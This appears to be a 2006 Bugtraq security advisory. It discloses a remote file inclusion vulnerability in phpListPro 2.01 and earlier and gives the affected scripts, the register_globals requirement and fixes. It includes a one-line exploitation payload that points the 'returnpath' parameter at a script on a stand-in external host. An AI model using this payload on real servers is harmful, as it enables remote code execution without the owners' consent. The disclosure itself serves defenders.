[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060508145004.30035.qmail@securityfocus.com>
Date: 8 May 2006 14:50:04 -0000
From: admin@...orsecurity.de
To: bugtraq@...urityfocus.com
Subject: [MajorSecurity] phpListPro <= 2.01 - Multiple Remote File Include
Vulnerability
[MajorSecurity] phpListPro <= 2.01 - Multiple Remote File Include Vulnerability
--------------------------------------------------------
Software: phpListPro
Version: <=2.01
Type: Multiple Remote File Include Vulnerability
Date: May, 8th 2006
Vendor: SmartISoft
Page: http://smartisoft.com
Risc: High
Credits:
----------------------------
'Aesthetico'
http://www.majorsecurity.de
Affected Products:
----------------------------
phpListPro 2.01 and prior
Description:
----------------------------
PHP/mySQL rating TopList professional.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "returnpath" parameter in "editsite.php", "addsite.php", "in.php" is not
properly verified, before it is used to include files.
This can be exploited to execute arbitrary code by including files from external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
----------------------------
Post data:
returnpath=http://www.yourspace.com/yourscript.php?
Powered by blists - more mailing lists